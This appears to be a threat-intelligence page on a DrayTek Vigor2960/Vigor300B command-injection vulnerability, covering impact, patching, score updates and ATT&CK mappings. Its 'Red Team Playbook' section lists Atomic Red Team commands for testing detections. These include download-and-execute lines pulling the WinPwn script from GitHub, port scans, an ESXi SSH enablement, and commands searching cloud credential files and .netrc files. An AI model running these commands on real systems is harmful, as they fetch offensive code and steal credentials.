CVE-2024-12987
Overview
This vulnerability is a remote OS command injection caused by improper sanitization of the 'session' parameter within the Web Management Interface component of DrayTek Vigor2960 and Vigor300B firmware version 1.5.1.4. The flaw resides in the /cgi-bin/mainfunction.cgi/apmcfgupload endpoint, where user-supplied input is executed without adequate validation, allowing arbitrary system commands to be injected and executed on the device.
Vulnerability Description
A vulnerability, which was classified as critical, was found in DrayTek Vigor2960 and Vigor300B 1.5.1.4. Affected is an unknown function of the file /cgi-bin/mainfunction.cgi/apmcfgupload of the component Web Management Interface. The manipulation of the argument session leads to os command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 1.5.1.5 is able to address this issue. It is recommended to upgrade the affected component.
Impact
An unauthenticated attacker can remotely execute arbitrary operating system commands on affected DrayTek devices by exploiting the vulnerable 'session' parameter, leading to full device compromise. This enables attackers to access sensitive configuration data, manipulate network traffic, or use the device as a foothold for lateral movement within the network. No user interaction or authentication is required, increasing the likelihood of exploitation and potential for widespread disruption or data breach in enterprise environments.
Solution
Upgrade DrayTek Vigor2960 and Vigor300B devices to firmware version 1.5.1.5 or later, as this update addresses the command injection vulnerability in the Web Management Interface. Refer to DrayTek's official security advisory and firmware release notes for detailed patching instructions. No alternative mitigations or workarounds are documented; applying the vendor-supplied firmware update is the recommended remediation.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
A critical vulnerability has been identified in the web management interface of specific DrayTek router models, namely the Vigor2960 and Vigor300B, running firmware version 1.5.1.4. The flaw resides in an unspecified function of the file responsible for handling configuration uploads, specifically the argument manipulation of the session parameter. This weakness allows for operating system command injection, which can be exploited remotely by an attacker. The nature of this vulnerability indicates that an unauthenticated user could potentially execute arbitrary commands on the underlying operating system, leading to severe security implications.
The attack vectors for this vulnerability are particularly concerning due to the remote nature of the exploit. An attacker could leverage this flaw by crafting a malicious request to the web management interface, manipulating the session argument to inject OS commands. This could be done from anywhere on the internet, provided the management interface is accessible. Once the command injection is successful, the attacker gains the ability to execute commands with the privileges of the web server process, which could lead to unauthorized access, data exfiltration, or even complete system compromise. Scenarios could include deploying malware, altering configurations, or pivoting to other devices within the network.
The real-world impact of this vulnerability is significant, especially for organizations relying on these routers for their network infrastructure. Given the critical nature of the flaw, successful exploitation could lead to substantial business risks, including data breaches, loss of sensitive information, and potential downtime. The ability for an attacker to execute commands remotely raises the stakes, as it could facilitate further attacks on internal systems or expose the organization to regulatory penalties if sensitive data is compromised. The financial implications of such breaches can be severe, encompassing both immediate remediation costs and long-term reputational damage.
Detection of this vulnerability can be challenging, as it may not generate obvious indicators of compromise. Organizations should implement robust logging and monitoring of their network traffic, particularly for any unusual requests targeting the web management interface of the affected devices. Intrusion detection systems (IDS) can be configured to alert on suspicious patterns that may indicate an attempted exploitation of this vulnerability. Regular vulnerability scanning should also be conducted to identify any instances of the affected firmware versions within the network.
Mitigation strategies are straightforward but critical. The primary recommendation is to upgrade the affected devices to the latest firmware version, which addresses this vulnerability. Organizations should prioritize this upgrade process, especially if the devices are exposed to the internet. Additionally, implementing network segmentation and restricting access to the management interface to trusted IP addresses can further reduce the risk of exploitation. Regular security assessments and adherence to best practices in device management will also help in maintaining a secure network environment, minimizing the potential impact of such vulnerabilities in the future.
The CVSS score for CVE-2024-12987 has been revised downward from 9.8 to 7.3, reflecting a reassessment of the vulnerability’s impact and exploitability. This adjustment indicates that while the vulnerability remains critical, its potential for widespread, high-severity exploitation is somewhat less than initially estimated. CSURFACE threat intelligence notes that this change aligns with a more nuanced understanding of the attack vector and the conditions required for successful exploitation, which may be more constrained than previously thought. Our telemetry continues to show stable exploit activity without a marked escalation or emergence of new proof-of-concept exploits, suggesting that adversaries have not significantly increased their operational use of this vulnerability. The EPSS score remains high, placing it in the upper percentiles for exploit likelihood, but the stable trend underscores a steady rather than rapidly growing threat. This recalibration of severity should prompt defenders to maintain vigilance but also to contextualize the risk within a broader threat landscape where other vulnerabilities may present more immediate or severe exploitation opportunities.
Update 2 — June 13, 2026
CSURFACE threat intelligence has noted a revision in the CVSS severity rating for CVE-2024-12987, elevating it from 7.3 to 9.8. This adjustment reflects a reassessment of the vulnerability’s impact, particularly emphasizing its remote code execution potential via OS command injection in the DrayTek Vigor2960 and Vigor300B web management interfaces. Although our telemetry does not indicate a marked escalation in exploitation attempts or the emergence of new proof-of-concept exploits, the heightened CVSS score signals a critical risk that demands increased attention. The vulnerability’s inclusion in the KEV catalog further underscores its priority status within the vulnerability management ecosystem. While the EPSS score remains high and stable, indicating a persistent likelihood of exploitation, the absence of a rapid increase in exploit activity suggests adversaries have not yet intensified operational use. This change elevates the threat level to critical, reinforcing the need for defenders to prioritize monitoring and mitigation efforts accordingly, as the potential impact of successful exploitation could be severe.
Update 3 — July 05, 2026
CSURFACE threat intelligence has detected a modest but meaningful uptick in activity exploiting CVE-2024-12987, reflected by a discernible increase in telemetry signals related to attempts targeting the vulnerable DrayTek Vigor2960 and Vigor300B devices. While the overall exploit landscape remains unchanged with no new public exploit variants emerging, this rise in detection frequency signals growing adversary interest or opportunistic scanning campaigns. The vulnerability’s critical severity and inclusion in the KEV catalog continue to underscore its high priority for defensive focus. This recent trend elevates the operational risk, indicating that threat actors may be incrementally intensifying reconnaissance or preparatory actions, which could precede more widespread exploitation attempts. Consequently, the threat level should be considered increasingly urgent, warranting heightened vigilance in monitoring and incident response activities.
Affected Products (2)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Draytek | Vigor300b Firmware | 1.5.1.4 |
cpe:2.3:o:draytek:vigor300b_firmware:1.5.1.4:*:*:*:*:*:*:*
|
|
|
Draytek | Vigor2960 Firmware | 1.5.1.4 |
cpe:2.3:o:draytek:vigor2960_firmware:1.5.1.4:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
4 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-88 | OS Command Injection |
52%
|
High | High | |
| CAPEC-6 | Argument Injection |
51%
|
High | High | |
| CAPEC-43 | Exploiting Multiple Input Interpretation Layers |
48%
|
Medium | High |
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.